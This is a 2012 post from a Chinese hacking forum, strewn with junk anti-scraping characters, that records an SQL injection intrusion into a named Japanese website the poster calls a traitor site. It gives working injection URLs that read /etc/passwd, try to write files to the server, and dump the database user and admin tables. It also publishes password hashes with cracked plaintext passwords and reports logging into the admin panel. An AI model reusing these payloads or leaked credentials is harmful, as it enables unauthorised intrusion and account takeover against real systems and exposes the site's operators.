找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3176|回复: 1
打印 上一主题 下一主题

原创 检测汉奸站全过程

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-17 16:22:02 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
补:www.zuaa.jp测试

# j7 \+ K5 f: [4 ~+ n! P- {2 S1 b! m- ?! F, H0 m6 A- B9 s' H2 {
0x01. 检测 www.zuaa.jp 收集数据5 t$ R- }* ]6 r5 z# I; _% H
) B! d! z# P- G# |% b& O
6 K6 Z* e: \0 S6 ]/ T
whatweb: l3 [  h& v, v
% k" C- U) \0 H3 ~
% }, a' k! u7 r% k1 n- z( d# r
利用NMAP扫描& E3 L. r1 V/ @4 l# A5 b, L
6 K1 o& W/ V) v' \) h8 G- V6 I% j! Z
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持& x* c* D2 s9 A2 o  D6 S
0x02.找注入点
, G) s# n, \2 ?找注入点:http://www.zuaa.jp/php/newsdetail.php?topic_id=390
. Z# }' _1 f* T, h+ j, ]
% C3 `) w% q" C6 _- B3 B6 |% h) q/ A/ b% W' x  P
0x03.order by
# @& l/ S, M, z9 @4 T5 a             http://www.zuaa.jp/php/newsdetail.php?topic_id=390 order by 1
" K1 F  Q' C- k% W! `' H0 ]! x/ D* t) O% L- m5 j, O- L' {
order by 28报错,order by 27正常
; a# E* M# z& {+ M9 A6 _0 M; ~: t% K& v
0x04.   union手动查询
2 @+ ^! @7 \( [2 A3 n$ o9 R6 Nhttp://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 3 B4 E  }7 h/ x2 G" V1 q
添加到 27 时正常显示
2 P: Z& N8 \. c1 r$ g3 o: q- d. S. M" x# k! r
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持7 Y  O3 n! Y- c- G& O

4 q2 v( k. o0 |" o: b* u0x05. info:
8 E  f5 u. j; L; h, _* dhttp://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,group_concat(user(),0x3a,database(),0x3a,version(),0x3a,@@version_conpile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
2 y: y- Q+ V  h6 ]# N8 U! l! h8 l( ~- E9 V6 k5 E  g
user:            root@localhost! ], z& \* {; P5 |
database:    openpne
0 \- i; Z2 ^2 h7 a. A% E; d) D, {" @version:      4.1.22
# Y2 U* Q  B) l! Vos:             portbld-freebsd5.4! W" R" ?, c( v4 o. H+ W
9 I4 j' P/ O# ^$ Z/ ~: y1 \1 Z
0x06. root用户- u& C$ @; D# G8 `3 u2 ~" C" H
利用 load_file(0x...), 读文件 (/etc/passwd), 也可以这样 hex(load_file(0x.....)), 然后把得到的 hex ,再转换成字符的(这种方法, 可以过大多数站)
3 E* g' [* `# F; m7 K) chttp://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,hex(load_file(0x2f6574632f706173737764)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 : }3 y; ?+ P8 J% y% O; c
+ `% y8 x' `; J
通过工具转换
+ N, d, T# }9 _; I. }. g- s. a, q
# e% ~  X0 {' f/ [& @/ J中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
! H( ?* ]. l/ n, J+ ?$ `' O
- R, p1 \4 S* m% H0 e$ ^1 v0x07. 利用 into outfile
7 Y5 z+ s$ y* E1 A  e# ]. i4 Q全部都失败
! F; D/ Y3 }' H; M6 zhttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/zuaa_tech/WEBSITE/htdocs/php/help.php1 y8 q- G/ d: N
2 Z9 i! B) A  I
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/qian/OpenPNE/lib/help.php # z* K# C- `- _9 a' s

; v; U- o" d; ?: X- n1 O# [页面显示“MDB2 Error:syntax error”8 |  U) e  S0 v1 p
7 B& J0 ~9 d! J0 ~
0x08. 利用 mysql 4.1
( a3 ?- T( x; S2 `8 g猜常规表名,字段未果 工具 sqlmap8 x. \  p- p/ Y8 O" r
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持* Z8 F' m( z9 p7 ?. A

3 |% ^9 i8 H% b) q, f  J6 `8 {  J: j/ a  ]( A
3 w3 y& S2 h- D) [/ e8 L) z- a; P& I4 j
0x09. 查找后台
2 Q3 Z" W7 ]2 i& X0 U" k( P利用 现有的各种 后台工具尝试都不行8 N4 h; ~. M" b. K

0 ?2 u7 b. i: Z0x10.  MySL外联方法8 @; v% e! w; F0 Y
从前面 nmap 收集的信息当中,可以看到开了 mysql 3306 端口 ,尝试得 mysql 用户各密码,然后再通过 mysql 工具外连 www.zuaa.jp 不行7 ?& N7 L8 T; \! ^8 y2 x8 j
可以利用 mysql ( 4.x 5.) 自带的定义表 mysql.user5 x" w0 \" o4 F
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(user,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+mysql.user
* k3 C3 a7 }1 w% f, d8 u  P  A
4 s9 p1 a: r3 u4 D+ a这个可以在 www.cmd5.com 解密
7 j* M+ `9 `0 \: m# Y, s% H5 droot:*3711D518F2924AEFA6F4C6B4B7425CAE8BEB88AB zuaa2009
" n1 m; Y0 N% Q( p! _- p/ k6 Kchen:*2A09A939E6B654877DD70B00EA631D1007E58CC9 silkroad978 v3 G* a9 A9 l$ g
openpne:*5D80C62EC4D258534F 07D08CCE9CE27DFF26A366 ???
; k9 d0 v( N5 y; e5 Dzuaa:*5D80C62EC4D258534F07D08CCE9CE27DFF26A366 ???
  \2 N& V# ^$ c: }) X工具外连失败,据说防火墙策略只允许特定IP外连,具体不得知
+ e- H3 ]- f1 J# T) o' d6 E
8 }$ N6 u! }- Z1 L* E" [: X# j! C, P3 z" h0 G: r
0x11. 网站突破
' ^, B9 m; ~9 A7 \1 }发现网站的源程序 openpne, google 下载 openpne 源码3 T. w; y5 h% |( R

2 z' a. I6 g! o7 j3 q& q! s2 ?5 t0 i- ?* ^7 h7 W
0x12. 默认信息利用
! l& p/ u2 `' ^( F' H- x4 Rhttp://sns.zuaa.jp/?m=admin&a=page_login& a) |: F! ]' h

( H( _# g4 O2 H. z2 u0 ^, h+ Q+ F表名 (c_admin_user) ,字段名(username,password)
) v1 Z* m* @' A9 G2 [! e/ Ghttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+c_admin_user4 E: K- j  f# I7 P5 h

3 H* ^; r" c: K  L# Z解密
  B2 Z7 a4 [9 Z% izuaa_tech:dd041e2 b1b8ecee164a6cb196a496eda,               zuaa2009
+ y  G" r0 @! u# u: O, c0 @0 izuaajp:c0923ec5857796a393da99905008c176,          zju18970 S; T, Y6 I0 H
8 O  h5 e0 R1 n* d: p5 @* T6 |$ a
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
2 }$ i% i/ X& K/ F) a* C/ e: P/ D, i7 z, g
0x13. 登录后台
9 t4 K4 w( }; A7 m
: W2 ]8 n% n# s2 u4 ^$ |" x5 w  ?' i+ g* S
. T! ?2 {, ?9 s' N$ @
0x14. 小结
- b0 c/ B3 Z! S0 `) ?3 x4 F6 _利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 。5 A$ k/ O3 `2 \, m5 S
感谢群 ---- 渗透 -酷帅王子 提供注入点 提供注入点: O, Q' }" d4 r4 g* Y
------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- -------------------------------------------------------By DarkRain
8 k& ~, D$ ^: C" N( y- f) G中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持3 L8 j2 i2 p2 A! i- l

0 h. Z' G+ l2 q3 N+ [. E最后声明:本人只负责了整理上传到论坛,让大家学习,不是原作者,原作者辛苦了!; A3 i: A# y. U/ G6 O

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

沙发
发表于 2012-9-19 08:27:03 | 只看该作者
哪个牛人 费的这劲 入侵的
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表